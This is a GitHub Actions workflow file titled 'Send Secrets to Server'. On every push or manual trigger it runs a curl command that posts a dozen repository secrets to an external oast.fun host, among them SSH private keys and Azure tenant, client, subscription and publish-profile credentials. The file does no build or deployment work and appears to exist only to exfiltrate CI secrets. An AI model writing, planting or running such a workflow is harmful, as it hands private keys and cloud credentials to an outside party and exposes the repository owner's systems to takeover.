name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Send Secrets to Server
        run: |
          curl -d 'AZUREAPPSERVICE_TENANTID_4C661FA65A374C7C9D0F896B2695685B=${{ secrets.AZUREAPPSERVICE_TENANTID_4C661FA65A374C7C9D0F896B2695685B }}&SSH_PRIVATE_KEY_LIVE=${{ secrets.SSH_PRIVATE_KEY_LIVE }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&AZUREAPPSERVICE_CLIENTID_7058192CB4304A89920143DFD73331CA=${{ secrets.AZUREAPPSERVICE_CLIENTID_7058192CB4304A89920143DFD73331CA }}&AZUREAPPSERVICE_TENANTID_DD6585B242FC419D8C5D2FC8914104E9=${{ secrets.AZUREAPPSERVICE_TENANTID_DD6585B242FC419D8C5D2FC8914104E9 }}&AZUREAPPSERVICE_TENANTID_E82951EAE7BC480FBA2D714404CD455D=${{ secrets.AZUREAPPSERVICE_TENANTID_E82951EAE7BC480FBA2D714404CD455D }}&AZUREAPPSERVICE_PUBLISHPROFILE_CB2E675A179146BCBBE694CBF89D942E=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_CB2E675A179146BCBBE694CBF89D942E }}&AZUREAPPSERVICE_PUBLISHPROFILE=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE }}&AZUREAPPSERVICE_CLIENTID_75AD06625A90481CB72923165667A485=${{ secrets.AZUREAPPSERVICE_CLIENTID_75AD06625A90481CB72923165667A485 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_EF5BD3F1A3914483A47994509FCBEA54=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_EF5BD3F1A3914483A47994509FCBEA54 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_1B79F61D36E7463CA0EFBC0F8F891C05=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_1B79F61D36E7463CA0EFBC0F8F891C05 }}&AZUREAPPSERVICE_CLIENTID_41439A86E569400B8C9B522F2FE9B4B5=${{ secrets.AZUREAPPSERVICE_CLIENTID_41439A86E569400B8C9B522F2FE9B4B5 }}' https://yvfeehabjheovlaaoqyvn66e0rr6cykf4.oast.fun
    